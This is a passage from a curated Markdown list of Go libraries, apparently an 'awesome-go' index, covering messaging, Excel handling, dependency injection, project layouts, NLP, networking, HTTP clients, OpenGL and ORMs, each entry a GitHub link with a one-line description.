[mangos](https://github.com/nanomsg/mangos) - Pure go implementation of the Nanomsg (\"Scalability Protocols\") with transport interoperability.\n- [melody](https://github.com/olahol/melody) - Minimalist framework for dealing with websocket sessions, includes broadcasting and automatic ping/pong handling.\n- [Mercure](https://github.com/dunglas/mercure) - Server and library to dispatch server-sent updates using the Mercure protocol (built on top of Server-Sent Events).\n- [messagebus](https://github.com/vardius/message-bus) - messagebus is a Go simple async message bus, perfect for using as event bus when doing event sourcing, CQRS, DDD.\n- [mob](https://github.com/erni27/mob) - mob is a generic-based, simple mediator / event aggregator library. It supports in-process requests / events processing.\n- [NATS Go Client](https://github.com/nats-io/nats) - Lightweight and high performance publish-subscribe and distributed queueing messaging system - this is the Go library.\n- [nsq-event-bus](https://github.com/rafaeljesus/nsq-event-bus) - A tiny wrapper around NSQ topic and channel.\n- [oplog](https://github.com/dailymotion/oplog) - Generic oplog/replication system for REST APIs.\n- [pubsub](https://github.com/tuxychandru/pubsub) - Simple pubsub package for go.\n- [Quamina](https://github.com/timbray/quamina) - Fast pattern-matching for filtering messages and events.\n- [rabbus](https://github.com/rafaeljesus/rabbus) - A tiny wrapper over amqp exchanges and queues.\n- [rabtap](https://github.com/jandelgado/rabtap) - RabbitMQ swiss army knife cli app.\n- [RapidMQ](https://github.com/sybrexsys/RapidMQ) - RapidMQ is a lightweight and reliable library for managing of the local messages queue.\n- [Ratus](https://github.com/hyperonym/ratus) - Ratus is a RESTful asynchronous task queue server.\n- [redisqueue](https://github.com/robinjoseph08/redisqueue) - redisqueue provides a producer and consumer of a queue that uses Redis streams.\n- [rmqconn](https://github.com/sbabiv/rmqconn) - RabbitMQ Reconnection. Wrapper over amqp.Connection and amqp.Dial. Allowing to do a reconnection when the connection is broken before forcing the call to the Close () method to be closed.\n- [sarama](https://github.com/Shopify/sarama) - Go library for Apache Kafka.\n- [Uniqush-Push](https://github.com/uniqush/uniqush-push) - Redis backed unified push service for server-side notifications to mobile devices.\n- [Watermill](https://github.com/ThreeDotsLabs/watermill) - Working efficiently with message streams. Building event driven applications, enabling event sourcing, RPC over messages, sagas. Can use conventional pub/sub implementations like Kafka or RabbitMQ, but also HTTP or MySQL binlog.\n- [zmq4](https://github.com/pebbe/zmq4) - Go interface to ZeroMQ version 4. Also available for [version 3](https://github.com/pebbe/zmq3) and [version 2](https://github.com/pebbe/zmq2).\n\n**[⬆ back to top](#contents)**\n\n## Microsoft Office\n\n- [unioffice](https://github.com/unidoc/unioffice) - Pure go library for creating and processing Office Word (.docx), Excel (.xlsx) and Powerpoint (.pptx) documents.\n\n### Microsoft Excel\n\n_Libraries for working with Microsoft Excel._\n\n- [excelize](https://github.com/xuri/excelize) - Golang library for reading and writing Microsoft Excel&trade; (XLSX) files.\n- [exl](https://github.com/go-the-way/exl) - Excel binding to struct written in Go.(Only supports Go1.18+)\n- [go-excel](https://github.com/szyhf/go-excel) - A simple and light reader to read a relate-db-like excel as a table.\n- [goxlsxwriter](https://github.com/fterrag/goxlsxwriter) - Golang bindings for libxlsxwriter for writing XLSX (Microsoft Excel) files.\n- [xlsx](https://github.com/tealeg/xlsx) - Library to simplify reading the XML format used by recent version of Microsoft Excel in Go programs.\n- [xlsx](https://github.com/plandem/xlsx) - Fast and safe way to read/update your existing Microsoft Excel files in Go programs.\n\n**[⬆ back to top](#contents)**\n\n## Miscellaneous\n\n### Dependency Injection\n\n_Libraries for working with dependency injection._\n\n- [alice](https://github.com/magic003/alice) - Additive dependency injection container for Golang.\n- [di](https://github.com/goava/di) - A dependency injection container for go programming language.\n- [dig](https://github.com/uber-go/dig) - A reflection based dependency injection toolkit for Go.\n- [dingo](https://github.com/i-love-flamingo/dingo) - A dependency injection toolkit for Go, based on Guice.\n- [do](https://github.com/samber/do) - A dependency injection framework based on Generics.\n- [fx](https://github.com/uber-go/fx) - A dependency injection based application framework for Go (built on top of dig).\n- [gocontainer](https://github.com/vardius/gocontainer) - Simple Dependency Injection Container.\n- [goioc/di](https://github.com/goioc/di) - Spring-inspired Dependency Injection Container.\n- [GoLobby/Container](https://github.com/golobby/container) - GoLobby Container is a lightweight yet powerful IoC dependency injection container for the Go programming language.\n- [google/wire](https://github.com/google/wire) - Automated Initialization in Go.\n- [HnH/di](https://github.com/HnH/di) - DI container library that is focused on clean API and flexibility.\n- [kinit](https://github.com/go-kata/kinit) - Customizable dependency injection container with the global mode, cascade initialization and panic-safe finalization.\n- [linker](https://github.com/logrange/linker) - A reflection based dependency injection and inversion of control library with components lifecycle support.\n- [nject](https://github.com/muir/nject) - A type safe, reflective framework for libraries, tests, http endpoints, and service startup.\n- [wire](https://github.com/Fs02/wire) - Strict Runtime Dependency Injection for Golang.\n\n**[⬆ back to top](#contents)**\n\n### Project Layout\n\n_**Unofficial** set of patterns for structuring projects._\n\n- [ardanlabs/service](https://github.com/ardanlabs/service) - A [starter kit](https://github.com/ardanlabs/service/wiki) for building production grade scalable web service applications.\n- [cookiecutter-golang](https://github.com/lacion/cookiecutter-golang) - A Go application boilerplate template for quick starting projects following production best practices.\n- [go-module](https://github.com/octomation/go-module) - Template for a typical module written on Go.\n- [go-sample](https://github.com/zitryss/go-sample) - A sample layout for Go application projects with the real code.\n- [go-starter](https://github.com/allaboutapps/go-starter) - An opinionated production-ready RESTful JSON backend template, highly integrated with VSCode DevContainers.\n- [go-todo-backend](https://github.com/Fs02/go-todo-backend) - Go Todo Backend example using modular project layout for product microservice.\n- [gobase](https://github.com/wajox/gobase) - A simple skeleton for golang application with basic setup for real golang application.\n- [golang-standards/project-layout](https://github.com/golang-standards/project-layout) - Set of common historical and emerging project layout patterns in the Go ecosystem. Note: despite the org-name they do not represent official golang standards, see [this issue](https://github.com/golang-standards/project-layout/issues/117) for more information. Nonetheless, some may find the layout useful.\n- [golang-templates/seed](https://github.com/golang-templates/seed) - Go application GitHub repository template.\n- [insidieux/inizio](https://github.com/insidieux/inizio) - Golang project layout generator with plugins.\n- [modern-go-application](https://github.com/sagikazarmark/modern-go-application) - Go application boilerplate and example applying modern practices.\n- [pagoda](https://github.com/mikestefanello/pagoda) - Rapid, easy full-stack web development starter kit built in Go.\n- [scaffold](https://github.com/catchplay/scaffold) - Scaffold generates a starter Go project layout. Lets you focus on business logic implemented.\n- [wangyoucao577/go-project-layout](https://github.com/wangyoucao577/go-project-layout) - Set of practices and discussions on how to structure Go project layout.\n\n**[⬆ back to top](#contents)**\n\n### Strings\n\n_Libraries for working with strings._\n\n- [bexp](https://github.com/mkungla/bexp) - Go implementation of Brace Expansion mechanism to generate arbitrary strings.\n- [caps](https://github.com/chanced/caps) - A case conversion library.\n- [go-formatter](https://gitlab.com/tymonx/go-formatter) - Implements **replacement fields** surrounded by curly braces `{}` format strings.\n- [gobeam/Stringy](https://github.com/gobeam/Stringy) - String manipulation library to convert string to camel case, snake case, kebab case / slugify etc.\n- [strutil](https://github.com/ozgio/strutil) - String utilities.\n- [sttr](https://github.com/abhimanyu003/sttr) - cross-platform, cli app to perform various operations on string.\n- [xstrings](https://github.com/huandu/xstrings) - Collection of useful string functions ported from other languages.\n\n**[⬆ back to top](#contents)**\n\n### Uncategorized\n\n_These libraries were placed here because none of the other categories seemed to fit._\n\n- [anagent](https://github.com/mudler/anagent) - Minimalistic, pluggable Golang evloop/timer handler with dependency-injection.\n- [antch](https://github.com/antchfx/antch) - A fast, powerful and extensible web crawling & scraping framework.\n- [archiver](https://github.com/mholt/archiver) - Library and command for making and extracting .zip and .tar.gz archives.\n- [autoflags](https://github.com/artyom/autoflags) - Go package to automatically define command line flags from struct fields.\n- [avgRating](https://github.com/kirillDanshin/avgRating) - Calculate average score and rating based on Wilson Score Equation.\n- [banner](https://github.com/dimiro1/banner) - Add beautiful banners into your Go applications.\n- [base64Captcha](https://github.com/mojocn/base64Captcha) - Base64captch supports digit, number, alphabet, arithmetic, audio and digit-alphabet captcha.\n- [basexx](https://github.com/bobg/basexx) - Convert to, from, and between digit strings in various number bases.\n- [battery](https://github.com/distatus/battery) - Cross-platform, normalized battery information library.\n- [bitio](https://github.com/icza/bitio) - Highly optimized bit-level Reader and Writer for Go.\n- [browscap_go](https://github.com/digitalcrab/browscap_go) - GoLang Library for [Browser Capabilities Project](https://browscap.org/).\n- [captcha](https://github.com/steambap/captcha) - Package captcha provides an easy to use, unopinionated API for captcha generation.\n- [common](https://github.com/kubeservice-stack/common) - A library for server framework.\n- [conv](https://github.com/cstockton/go-conv) - Package conv provides fast and intuitive conversions across Go types.\n- [datacounter](https://github.com/miolini/datacounter) - Go counters for readers/writer/http.ResponseWriter.\n- [faker](https://github.com/neotoolkit/faker) - Fake data generator.\n- [faker](https://github.com/pioz/faker) - Random fake data and struct generator for Go.\n- [ffmt](https://github.com/go-ffmt/ffmt) - Beautify data display for Humans.\n- [gatus](https://github.com/TwinProduction/gatus) - Automated service health dashboard.\n- [go-commandbus](https://github.com/lana/go-commandbus) - A slight and pluggable command-bus for Go.\n- [go-commons-pool](https://github.com/jolestar/go-commons-pool) - Generic object pool for Golang.\n- [go-openapi](https://github.com/go-openapi) - Collection of packages to parse and utilize open-api schemas.\n- [go-resiliency](https://github.com/eapache/go-resiliency) - Resiliency patterns for golang.\n- [go-unarr](https://github.com/gen2brain/go-unarr) - Decompression library for RAR, TAR, ZIP and 7z archives.\n- [gofakeit](https://github.com/brianvoe/gofakeit) - Random data generator written in go.\n- [gommit](https://github.com/antham/gommit) - Analyze git commit messages to ensure they follow defined patterns.\n- [gopsutil](https://github.com/shirou/gopsutil) - Cross-platform library for retrieving process and system utilization(CPU, Memory, Disks, etc).\n- [gosh](https://github.com/osamingo/gosh) - Provide Go Statistics Handler, Struct, Measure Method.\n- [gosms](https://github.com/haxpax/gosms) - Your own local SMS gateway in Go that can be used to send SMS.\n- [gotoprom](https://github.com/cabify/gotoprom) - Type-safe metrics builder wrapper library for the official Prometheus client.\n- [gountries](https://github.com/pariz/gountries) - Package that exposes country and subdivision data.\n- [gtree](https://github.com/ddddddO/gtree) - Provide CLI, Package and Web for tree output and directories creation from Markdown or programmatically.\n- [health](https://github.com/alexliesenfeld/health) - A simple and flexible health check library for Go.\n- [health](https://github.com/dimiro1/health) - Easy to use, extensible health check library.\n- [healthcheck](https://github.com/etherlabsio/healthcheck) - An opinionated and concurrent health-check HTTP handler for RESTful services.\n- [hostutils](https://github.com/Wing924/hostutils) - A golang library for packing and unpacking FQDNs list.\n- [indigo](https://github.com/osamingo/indigo) - Distributed unique ID generator of using Sonyflake and encoded by Base58.\n- [lk](https://github.com/hyperboloide/lk) - A simple licensing library for golang.\n- [llvm](https://github.com/llir/llvm) - Library for interacting with LLVM IR in pure Go.\n- [metrics](https://github.com/pascaldekloe/metrics) - Library for metrics instrumentation and Prometheus exposition.\n- [morse](https://github.com/alwindoss/morse) - Library to convert to and from morse code.\n- [numa](https://github.com/lrita/numa) - NUMA is a utility library, which is written in go. It help us to write some NUMA-AWARED code.\n- [openapi](https://github.com/neotoolkit/openapi) - OpenAPI 3.x parser.\n- [pdfgen](https://github.com/hyperboloide/pdfgen) - HTTP service to generate PDF from Json requests.\n- [persian](https://github.com/mavihq/persian) - Some utilities for Persian language in go.\n- [sandid](https://github.com/aofei/sandid) - Every grain of sand on earth has its own ID.\n- [shellwords](https://github.com/Wing924/shellwords) - A Golang library to manipulate strings according to the word parsing rules of the UNIX Bourne shell.\n- [shortid](https://github.com/teris-io/shortid) - Distributed generation of super short, unique, non-sequential, URL friendly IDs.\n- [shoutrrr](https://github.com/containrrr/shoutrrr) - Notification library providing easy access to various messaging services like slack, mattermost, gotify and smtp among others.\n- [sitemap-format](https://github.com/mingard/sitemap-format) - A simple sitemap generator, with a little syntactic sugar.\n- [stateless](https://github.com/qmuntal/stateless) - A fluent library for creating state machines.\n- [stats](https://github.com/go-playground/stats) - Monitors Go MemStats + System stats such as Memory, Swap and CPU and sends via UDP anywhere you want for logging etc...\n- [turtle](https://github.com/hackebrot/turtle) - Emojis for Go.\n- [url-shortener](https://github.com/pantrif/url-shortener) - A modern, powerful, and robust URL shortener microservice with mysql support.\n- [VarHandler](https://github.com/azr/generators/tree/master/varhandler) - Generate boilerplate http input and output handling.\n- [varint](https://github.com/chmike/varint) - A faster varying length integer encoder/decoder than the one provided in the standard library.\n- [xdg](https://github.com/rkoesters/xdg) - FreeDesktop.org (xdg) Specs implemented in Go.\n- [xkg](https://github.com/go-xkg/xkg) - X Keyboard Grabber.\n- [xz](https://github.com/ulikunitz/xz) - Pure golang package for reading and writing xz-compressed files.\n\n**[⬆ back to top](#contents)**\n\n## Natural Language Processing\n\n_Libraries for working with human languages._\n\nSee also [Text Processing](#text-processing) and [Text Analysis](#text-analysis).\n\n### Language Detection\n\n- [detectlanguage](https://github.com/detectlanguage/detectlanguage-go) - Language Detection API Go Client. Supports batch requests, short phrase or single word language detection.\n- [getlang](https://github.com/rylans/getlang) - Fast natural language detection package.\n- [guesslanguage](https://github.com/endeveit/guesslanguage) - Functions to determine the natural language of a unicode text.\n- [whatlanggo](https://github.com/abadojack/whatlanggo) - Natural language detection package for Go. Supports 84 languages and 24 scripts (writing systems e.g. Latin, Cyrillic, etc).\n\n### Morphological Analyzers\n\n- [go-stem](https://github.com/agonopol/go-stem) - Implementation of the porter stemming algorithm.\n- [go2vec](https://github.com/danieldk/go2vec) - Reader and utility functions for word2vec embeddings.\n- [golibstemmer](https://github.com/rjohnsondev/golibstemmer) - Go bindings for the snowball libstemmer library including porter 2.\n- [gosentiwordnet](https://github.com/dinopuguh/gosentiwordnet) - Sentiment analyzer using sentiwordnet lexicon in Go.\n- [govader](https://github.com/jonreiter/govader) - Go implementation of [VADER Sentiment Analysis](https://github.com/cjhutto/vaderSentiment).\n- [govader-backend](https://github.com/PIMPfiction/govader_backend) - Microservice implementation of [GoVader](https://github.com/jonreiter/govader).\n- [kagome](https://github.com/ikawaha/kagome) - JP morphological analyzer written in pure Go.\n- [libtextcat](https://github.com/goodsign/libtextcat) - Cgo binding for libtextcat C library. Guaranteed compatibility with version 2.2.\n- [nlp](https://github.com/Shixzie/nlp) - Extract values from strings and fill your structs with nlp.\n- [nlp](https://github.com/james-bowman/nlp) - Go Natural Language Processing library supporting LSA (Latent Semantic Analysis).\n- [paicehusk](https://github.com/rookii/paicehusk) - Golang implementation of the Paice/Husk Stemming Algorithm.\n- [porter](https://github.com/a2800276/porter) - This is a fairly straightforward port of Martin Porter's C implementation of the Porter stemming algorithm.\n- [porter2](https://github.com/zhenjl/porter2) - Really fast Porter 2 stemmer.\n- [RAKE.go](https://github.com/afjoseph/RAKE.Go) - Go port of the Rapid Automatic Keyword Extraction Algorithm (RAKE).\n- [snowball](https://github.com/goodsign/snowball) - Snowball stemmer port (cgo wrapper) for Go. Provides word stem extraction functionality [Snowball native](http://snowball.tartarus.org/).\n- [spaGO](https://github.com/nlpodyssey/spago) - Self-contained Machine Learning and Natural Language Processing library in Go.\n- [spelling-corrector](https://github.com/jorelosorio/spellingcorrector) - A spelling corrector for the Spanish language or create your own.\n\n### Slugifiers\n\n- [go-slugify](https://github.com/mozillazg/go-slugify) - Make pretty slug with multiple languages support.\n- [slug](https://github.com/gosimple/slug) - URL-friendly slugify with multiple languages support.\n- [Slugify](https://github.com/avelino/slugify) - Go slugify application that handles string.\n\n### Tokenizers\n\n- [gojieba](https://github.com/yanyiwu/gojieba) - This is a Go implementation of [jieba](https://github.com/fxsjy/jieba) which a Chinese word splitting algorithm.\n- [gotokenizer](https://github.com/xujiajun/gotokenizer) - A tokenizer based on the dictionary and Bigram language models for Golang. (Now only support chinese segmentation)\n- [gse](https://github.com/go-ego/gse) - Go efficient text segmentation; support english, chinese, japanese and other.\n- [MMSEGO](https://github.com/awsong/MMSEGO) - This is a GO implementation of [MMSEG](http://technology.chtsai.org/mmseg/) which a Chinese word splitting algorithm.\n- [prose](https://github.com/jdkato/prose) - Library for text processing that supports tokenization, part-of-speech tagging, named-entity extraction, and more. English only.\n- [segment](https://github.com/blevesearch/segment) - Go library for performing Unicode Text Segmentation as described in [Unicode Standard Annex #29](https://www.unicode.org/reports/tr29/)\n- [sentences](https://github.com/neurosnap/sentences) - Sentence tokenizer: converts text into a list of sentences.\n- [shamoji](https://github.com/osamingo/shamoji) - The shamoji is word filtering package written in Go.\n- [stemmer](https://github.com/dchest/stemmer) - Stemmer packages for Go programming language. Includes English and German stemmers.\n- [textcat](https://github.com/pebbe/textcat) - Go package for n-gram based text categorization, with support for utf-8 and raw text.\n\n### Translation\n\n- [go-i18n](https://github.com/nicksnyder/go-i18n/) - Package and an accompanying tool to work with localized text.\n- [go-localize](https://github.com/m1/go-localize) - Simple and easy to use i18n (Internationalization and localization) engine - used for translating locale strings.\n- [go-mystem](https://github.com/dveselov/mystem) - CGo bindings to Yandex.Mystem - russian morphology analyzer.\n- [go-pinyin](https://github.com/mozillazg/go-pinyin) - CN Hanzi to Hanyu Pinyin converter.\n- [gotext](https://github.com/leonelquinteros/gotext) - GNU gettext utilities for Go.\n- [icu](https://github.com/goodsign/icu) - Cgo binding for icu4c C library detection and conversion functions. Guaranteed compatibility with version 50.1.\n- [iuliia-go](https://github.com/mehanizm/iuliia-go) - Transliterate Cyrillic → Latin in every possible way.\n- [spreak](https://github.com/vorlif/spreak) - Flexible translation and humanization library for Go, based on the concepts behind gettext.\n- [t](https://github.com/youthlin/t) - Another i18n pkg for golang, which follows GNU gettext style and supports .po/.mo files: `t.T (gettext)`, `t.N (ngettext)`, etc. And it contains a cmd tool [xtemplate](https://github.com/youthlin/t/blob/main/cmd/xtemplate), which can extract messages as a pot file from text/html template.\n\n### Transliteration\n\n- [enca](https://github.com/endeveit/enca) - Minimal cgo bindings for [libenca](https://cihar.com/software/enca/), which detects character encodings.\n- [go-unidecode](https://github.com/mozillazg/go-unidecode) - ASCII transliterations of Unicode text.\n- [gounidecode](https://github.com/fiam/gounidecode) - Unicode transliterator (also known as unidecode) for Go.\n- [transliterator](https://github.com/alexsergivan/transliterator) - Provides one-way string transliteration with supporting of language-specific transliteration rules.\n\n**[⬆ back to top](#contents)**\n\n## Networking\n\n_Libraries for working with various layers of the network._\n\n- [arp](https://github.com/mdlayher/arp) - Package arp implements the ARP protocol, as described in RFC 826.\n- [buffstreams](https://github.com/stabbycutyou/buffstreams) - Streaming protocolbuffer data over TCP made easy.\n- [canopus](https://github.com/zubairhamed/canopus) - CoAP Client/Server implementation (RFC 7252).\n- [cidranger](https://github.com/yl2chen/cidranger) - Fast IP to CIDR lookup for Go.\n- [dhcp6](https://github.com/mdlayher/dhcp6) - Package dhcp6 implements a DHCPv6 server, as described in RFC 3315.\n- [dns](https://github.com/miekg/dns) - Go library for working with DNS.\n- [dnsmonster](https://github.com/mosajjal/dnsmonster) - Passive DNS Capture/Monitoring Framework.\n- [easytcp](https://github.com/DarthPestilane/easytcp) - A light-weight TCP framework written in Go (Golang), built with message router. EasyTCP helps you build a TCP server easily fast and less painful.\n- [ether](https://github.com/songgao/ether) - Cross-platform Go package for sending and receiving ethernet frames.\n- [ethernet](https://github.com/mdlayher/ethernet) - Package ethernet implements marshaling and unmarshaling of IEEE 802.3 Ethernet II frames and IEEE 802.1Q VLAN tags.\n- [event](https://github.com/cheng-zhongliang/event) - Simple I/O event notification library wirtten in Golang.\n- [fasthttp](https://github.com/valyala/fasthttp) - Package fasthttp is a fast HTTP implementation for Go, up to 10 times faster than net/http.\n- [fortio](https://github.com/fortio/fortio) - Load testing library and command line tool, advanced echo server and web UI. Allows to specify a set query-per-second load and record latency histograms and other useful stats and graph them. Tcp, Http, gRPC.\n- [ftp](https://github.com/jlaffaye/ftp) - Package ftp implements a FTP client as described in [RFC 959](https://tools.ietf.org/html/rfc959).\n- [ftpserverlib](https://github.com/fclairamb/ftpserverlib) - Fully featured FTP server library.\n- [fullproxy](https://github.com/shoriwe/fullproxy) - A fully featured scriptable and daemon configurable proxy and pivoting toolkit with SOCKS5, HTTP, raw ports and reverse proxy protocols.\n- [gaio](https://github.com/xtaci/gaio) - High performance async-io networking for Golang in proactor mode.\n- [gev](https://github.com/Allenxuxu/gev) - gev is a lightweight, fast non-blocking TCP network library based on Reactor mode.\n- [gldap](https://github.com/jimlambrt/gldap) - gldap provides an ldap server implementation and you provide handlers for its ldap operations.\n- [gmqtt](https://github.com/DrmagicE/gmqtt) - Gmqtt is a flexible, high-performance MQTT broker library that fully implements the MQTT protocol V3.1.1.\n- [gnet](https://github.com/panjf2000/gnet) - `gnet` is a high-performance, lightweight, non-blocking, event-driven networking framework written in pure Go.\n- [gnet](https://github.com/fish-tennis/gnet) - `gnet` is a high-performance networking framework,especially for game servers.\n- [gNxI](https://github.com/google/gnxi) - A collection of tools for Network Management that use the gNMI and gNOI protocols.\n- [go-getter](https://github.com/hashicorp/go-getter) - Go library for downloading files or directories from various sources using a URL.\n- [go-powerdns](https://github.com/joeig/go-powerdns) - PowerDNS API bindings for Golang.\n- [go-sse](https://github.com/lampctl/go-sse) - Go client and server implementation of HTML server-sent events.\n- [go-stun](https://github.com/ccding/go-stun) - Go implementation of the STUN client (RFC 3489 and RFC 5389).\n- [gobgp](https://github.com/osrg/gobgp) - BGP implemented in the Go Programming Language.\n- [golibwireshark](https://github.com/sunwxg/golibwireshark) - Package golibwireshark use libwireshark library to decode pcap file and analyse dissection data.\n- [gopacket](https://github.com/google/gopacket) - Go library for packet processing with libpcap bindings.\n- [gopcap](https://github.com/akrennmair/gopcap) - Go wrapper for libpcap.\n- [goshark](https://github.com/sunwxg/goshark) - Package goshark use tshark to decode IP packet and create data struct to analyse packet.\n- [gosnmp](https://github.com/soniah/gosnmp) - Native Go library for performing SNMP actions.\n- [gotcp](https://github.com/gansidui/gotcp) - Go package for quickly writing tcp applications.\n- [grab](https://github.com/cavaliercoder/grab) - Go package for managing file downloads.\n- [graval](https://github.com/koofr/graval) - Experimental FTP server framework.\n- [gws](https://github.com/lxzan/gws) - High-Performance WebSocket Server & Client With AsyncIO Supporting .\n- [HTTPLab](https://github.com/gchaincl/httplab) - HTTPLabs let you inspect HTTP requests and forge responses.\n- [httpproxy](https://github.com/wzshiming/httpproxy) - HTTP proxy handler and dialer.\n- [iplib](https://github.com/c-robinson/iplib) - Library for working with IP addresses (net.IP, net.IPNet), inspired by python [ipaddress](https://docs.python.org/3/library/ipaddress.html) and ruby [ipaddr](https://ruby-doc.org/stdlib-2.5.1/libdoc/ipaddr/rdoc/IPAddr.html)\n- [jazigo](https://github.com/udhos/jazigo) - Jazigo is a tool written in Go for retrieving configuration for multiple network devices.\n- [kcp-go](https://github.com/xtaci/kcp-go) - KCP - Fast and Reliable ARQ Protocol.\n- [kcptun](https://github.com/xtaci/kcptun) - Extremely simple & fast udp tunnel based on KCP protocol.\n- [lhttp](https://github.com/fanux/lhttp) - Powerful websocket framework, build your IM server more easily.\n- [linkio](https://github.com/ian-kent/linkio) - Network link speed simulation for Reader/Writer interfaces.\n- [llb](https://github.com/kirillDanshin/llb) - It's a very simple but quick backend for proxy servers. Can be useful for fast redirection to predefined domain with zero memory allocation and fast response.\n- [mdns](https://github.com/hashicorp/mdns) - Simple mDNS (Multicast DNS) client/server library in Golang.\n- [mqttPaho](https://eclipse.org/paho/clients/golang/) - The Paho Go Client provides an MQTT client library for connection to MQTT brokers via TCP, TLS or WebSockets.\n- [nbio](https://github.com/lesismal/nbio) - Pure Go 1000k+ connections solution, support tls/http1.x/websocket and basically compatible with net/http, with high-performance and low memory cost, non-blocking, event-driven, easy-to-use.\n- [netpoll](https://github.com/cloudwego/netpoll) - A high-performance non-blocking I/O networking framework, which focused on RPC scenarios, developed by ByteDance.\n- [NFF-Go](https://github.com/intel-go/nff-go) - Framework for rapid development of performant network functions for cloud and bare-metal (former YANFF).\n- [packet](https://github.com/aerogo/packet) - Send packets over TCP and UDP. It can buffer messages and hot-swap connections if needed.\n- [panoptes-stream](https://github.com/yahoo/panoptes-stream) - A cloud native distributed streaming network telemetry (gNMI, Juniper JTI and Cisco MDT).\n- [peerdiscovery](https://github.com/schollz/peerdiscovery) - Pure Go library for cross-platform local peer discovery using UDP multicast.\n- [portproxy](https://github.com/aybabtme/portproxy) - Simple TCP proxy which adds CORS support to API's which don't support it.\n- [publicip](https://github.com/polera/publicip) - Package publicip returns your public facing IPv4 address (internet egress).\n- [quic-go](https://github.com/lucas-clemente/quic-go) - An implementation of the QUIC protocol in pure Go.\n- [raw](https://github.com/mdlayher/raw) - Package raw enables reading and writing data at the device driver level for a network interface.\n- [sftp](https://github.com/pkg/sftp) - Package sftp implements the SSH File Transfer Protocol as described in .\n- [ssh](https://github.com/gliderlabs/ssh) - Higher-level API for building SSH servers (wraps crypto/ssh).\n- [sslb](https://github.com/eduardonunesp/sslb) - It's a Super Simples Load Balancer, just a little project to achieve some kind of performance.\n- [stun](https://github.com/go-rtc/stun) - Go implementation of RFC 5389 STUN protocol.\n- [tcp_server](https://github.com/firstrow/tcp_server) - Go library for building tcp servers faster.\n- [tspool](https://github.com/two/tspool) - A TCP Library use worker pool to improve performance and protect your server.\n- [utp](https://github.com/anacrolix/utp) - Go uTP micro transport protocol implementation.\n- [vssh](https://github.com/yahoo/vssh) - Go library for building network and server automation over SSH protocol.\n- [water](https://github.com/songgao/water) - Simple TUN/TAP library.\n- [webrtc](https://github.com/pions/webrtc) - A pure Go implementation of the WebRTC API.\n- [winrm](https://github.com/masterzen/winrm) - Go WinRM client to remotely execute commands on Windows machines.\n- [xtcp](https://github.com/xfxdev/xtcp) - TCP Server Framework with simultaneous full duplex communication, graceful shutdown, and custom protocol.\n\n**[⬆ back to top](#contents)**\n\n### HTTP Clients\n\n_Libraries for making HTTP requests._\n\n- [gentleman](https://github.com/h2non/gentleman) - Full-featured plugin-driven HTTP client library.\n- [go-cleanhttp](https://github.com/hashicorp/go-cleanhttp) - Get easily stdlib HTTP client, which does not share any state with other clients.\n- [go-http-client](https://github.com/bozd4g/go-http-client) - Make http calls simply and easily.\n- [go-otelroundtripper](https://github.com/NdoleStudio/go-otelroundtripper) - Go http.RoundTripper that emits open telemetry metrics for HTTP requests.\n- [go-req](https://github.com/wenerme/go-req) - Declarative golang HTTP client.\n- [go-retryablehttp](https://github.com/hashicorp/go-retryablehttp) - Retryable HTTP client in Go.\n- [go-zoox/fetch](https://github.com/go-zoox/fetch) - A Powerful, Lightweight, Easy Http Client, inspired by Web Fetch API.\n- [grequests](https://github.com/levigross/grequests) - A Go \"clone\" of the great and famous Requests library.\n- [heimdall](https://github.com/gojektech/heimdall) - An enhanced http client with retry and hystrix capabilities.\n- [httpretry](https://github.com/ybbus/httpretry) - Enriches the default go HTTP client with retry functionality.\n- [pester](https://github.com/sethgrid/pester) - Go HTTP client calls with retries, backoff, and concurrency.\n- [req](https://github.com/imroc/req) - Simple Go HTTP client with Black Magic (Less code and More efficiency).\n- [request](https://github.com/monaco-io/request) - HTTP client for golang. If you have experience about axios or requests, you will love it. No 3rd dependency.\n- [requests](https://github.com/carlmjohnson/requests) - HTTP requests for Gophers. Uses context.Context and doesn't hide the underlying net/http.Client, making it compatible with standard Go APIs. Also includes testing tools.\n- [resty](https://github.com/go-resty/resty) - Simple HTTP and REST client for Go inspired by Ruby rest-client.\n- [rq](https://github.com/ddo/rq) - A nicer interface for golang stdlib HTTP client.\n- [sling](https://github.com/dghubble/sling) - Sling is a Go HTTP client library for creating and sending API requests.\n\n**[⬆ back to top](#contents)**\n\n## OpenGL\n\n_Libraries for using OpenGL in Go._\n\n- [gl](https://github.com/go-gl/gl) - Go bindings for OpenGL (generated via glow).\n- [glfw](https://github.com/go-gl/glfw) - Go bindings for GLFW 3.\n- [go-glmatrix](https://github.com/technohippy/go-glmatrix) - Go port of [glMatrix](https://glmatrix.net/) library.\n- [goxjs/gl](https://github.com/goxjs/gl) - Go cross-platform OpenGL bindings (OS X, Linux, Windows, browsers, iOS, Android).\n- [goxjs/glfw](https://github.com/goxjs/glfw) - Go cross-platform glfw library for creating an OpenGL context and receiving events.\n- [mathgl](https://github.com/go-gl/mathgl) - Pure Go math package specialized for 3D math, with inspiration from GLM.\n\n**[⬆ back to top](#contents)**\n\n## ORM\n\n_Libraries that implement Object-Relational Mapping or datamapping techniques._\n\n- [bun](https://github.com/uptrace/bun) - SQL-first Golang ORM. Successor of go-pg.\n- [cacheme](https://github.com/Yiling-J/cacheme-go) - Schema based, typed Redis caching/memoize framework for Go.\n- [ent](https://github.com/facebook/ent) - An entity framework for Go. Simple, yet powerful ORM for modeling and querying data.\n- [go-firestorm](https://github.com/jschoedt/go-firestorm) - A simple ORM for Google/Firebase Cloud Firestore.\n- [go-sql](https://github.com/rushteam/gosql) - A easy ORM for mysql.\n- [go-sqlbuilder](https://github.com/huandu/go-sqlbuilder) - A flexible and powerful SQL string builder library plus a zero-config ORM.\n- [go-store](https://github.com/gosuri/go-store) - Simple and fast Redis backed key-value store library for Go.\n- [golobby/orm](https://github.com/golobby/orm) - Simple, fast, type-safe, generic orm for developer happiness.\n- [GORM](https://github.com/go-gorm/gorm) - The fantastic ORM library for Golang, aims to be developer friendly.\n- [gormt](https://github.com/xxjwxc/gormt) - Mysql database to golang gorm struct.\n- [gorp](https://github.com/go-gorp/gorp) - Go Relational Persistence, ORM-ish library for Go.\n- [grimoire](https://github.com/Fs02/grimoire) - Grimoire is a database access layer and validation for golang. (Support: MySQL, PostgreSQL and SQLite3).\n- [lore](https://github.com/abrahambotros/lore) - Simple and lightweight pseudo-ORM/pseudo-struct-mapping environment for Go.\n- [marlow](https://github.com/marlow/marlow) - Generated ORM from project structs for compile time safety assurances.\n- [pop/soda](https://github.com/gobuffalo/pop) - Database migration, creation, ORM, etc... for MySQL, PostgreSQL, and SQLite.\n- [Prisma](https://github.com/prisma/prisma-client-go) - Prisma Client Go, Typesafe database access for Go.\n- 